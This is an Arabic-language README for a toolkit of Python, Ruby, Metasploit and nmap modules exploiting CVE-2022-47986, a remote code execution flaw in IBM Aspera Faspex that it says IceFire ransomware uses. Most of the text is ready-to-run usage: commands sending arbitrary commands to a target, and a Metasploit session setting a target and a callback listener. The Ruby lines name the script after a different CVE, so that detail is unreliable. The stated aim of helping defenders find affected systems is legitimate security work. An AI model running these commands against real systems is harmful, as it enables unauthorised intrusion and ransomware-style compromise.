
CVE-2022-47986: وحدات Python وRuby وNMAP وMetasploit لاستغلال الثغرة الأمنية.
تُستغل هذه الثغرة في البرية. يستخدم IceFire هذه الثغرة لنشر برنامج الفدية على الأنظمة المستهدفة، وأود مساعدة فرق SOC/الفرق الزرقاء في تحديد الأنظمة المتأثرة، ومختبري الاختراق/الفرق الحمراء في استغلالها والإبلاغ عنها.
أقترح نصوصًا برمجية نقية بلغة بايثون وروبي، ووحدات Metasploit وnmap لاستغلال الثغرة التي تسبب تنفيذًا عن بُعد للكود (RCE) على IBM Aspera Faspex من إلغاء تسلسل YAML.
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local id
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c id
msf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2
مرخّص بموجب GPL، الإصدار 3.